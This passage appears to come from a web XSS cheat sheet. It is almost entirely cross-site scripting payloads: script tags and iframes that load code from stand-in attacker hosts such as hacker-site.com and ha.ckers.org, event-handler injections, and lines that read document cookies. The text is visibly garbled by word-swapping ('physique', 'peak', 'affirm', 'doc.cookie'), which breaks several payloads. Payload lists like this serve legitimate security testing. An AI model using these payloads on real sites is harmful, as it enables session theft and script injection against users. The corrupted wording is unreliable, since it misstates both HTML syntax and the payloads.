0043u0041u004bu0049u0043u0041u0067u0050u0048u004eu006au0063u006du006cu0077u0064u0044u0035u0068u0062u0047u0056u0079u0064u0043u0067u007au004bu0054u0077u0076u0063u0032u004eu0079u0061u0058u0042u0030u0050u0069u0041u0067u0043u0069u0041u0067u0049u0044u0078u006bu005au0057u005au007au0049u0047u0039u0075u0062u0047u0039u0068u005au0044u0030u0069u0059u0057u0078u006cu0063u006eu0051u006fu004eu0043u006bu0069u0050u006au0077u0076u005au0047u0056u006du0063u007au0034u0067u0049u0041u006fu0067u0049u0043u0041u0038u005au0079u0042u0076u0062u006du0078u0076u0059u0057u0051u0039u0049u006du0046u0073u005au0058u004au0030u004bu0044u0055u0070u0049u006au0034u0067u0049u0041u006fu0067u0049u0043u0041u0067u0049u0043u0041u0067u0050u0047u004eu0070u0063u006du004eu0073u005au0053u0042u0076u0062u006du0078u0076u0059u0057u0051u0039u0049u006du0046u0073u005au0058u004au0030u004bu0044u0059u0070u0049u0069u0041u0076u0050u0069u0041u0067u0043u0069u0041u0067u0049u0043u0041u0067u0049u0043u0041u0038u0064u0047u0056u0034u0064u0043u0042u0076u0062u006du0078u0076u0059u0057u0051u0039u0049u006du0046u0073u005au0058u004au0030u004bu0044u0063u0070u0049u006au0034u0038u004cu0033u0052u006cu0065u0048u0051u002bu0049u0043u0041u004bu0049u0043u0041u0067u0050u0043u0039u006eu0050u0069u0041u0067u0043u006au0077u0076u0063u0033u005au006eu0050u0069u0041u0067u0022u003eu003cu002fu0069u0066u0072u0061u006du0065u003e’);”></img>
</physique>
</html>
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY ONLOAD=alert(“XSS”)>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<TD BACKGROUND=”javascript:alert(‘XSS’)”>
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<OBJECT TYPE=”textual content/x-scriptlet” DATA=”http://hacker.com/xss.html”>
<EMBED SRC=”http://hacker.com/xss.swf” AllowScriptAccess=”all the time”>
&apos;;alert(String.fromCharCode(88,83,83))//&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//–&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
&apos;&apos;;!–&quot;&lt;XSS&gt;=&amp;{()}
&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;

See also  How To Carry out Exterior Black-box Penetration Testing in Group with “ZERO” Info

%253Cscriptpercent253Ealert('XSS')%253Cpercent252Fscriptpercent253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<INPUT TYPE="BUTTON" motion="alert('XSS')"/>
"><h1><IFRAME SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(doc.cookie)"></IFRAME>123</h1>
<IFRAME SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(doc.cookie)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(doc.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0percentEFpercentBBpercentBF
"><h1><IFRAME width="420" peak="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(doc.cookie)"></IFRAME>123</h1>
"><h1><iframe width="420" peak="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
><h1><IFRAME width="420" peak="315" frameborder="0" onmouseover="doc.location.href="https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
g""></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<IFRAME width="420" peak="315" frameborder="0" onload="alert(doc.cookie)"></IFRAME>
"><h1><IFRAME SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(doc.cookie)"></IFRAME>123</h1>
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(doc.cookie)"></IFRAME>
<iframe src="&Tab;javascript:immediate(1)&Tab;">
<svg><model>{font-family&colon;'<iframe/onload=affirm(1)>'
<enter/onmouseover="javaSCRIPT&colon;affirm&lpar;1&rpar;"
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=affirm(1) 
<kind><isindex formaction="javascript&colon;affirm(1)"
<img src=``&NewLine; onerror=alert(1)&NewLine;

XSS assaults may trigger a severe menace to net purposes primarily based on the malicious code injected by the hackers. The XSS cheat sheet supplies you a listing of snippets for use in detecting XSS vulnerabilities.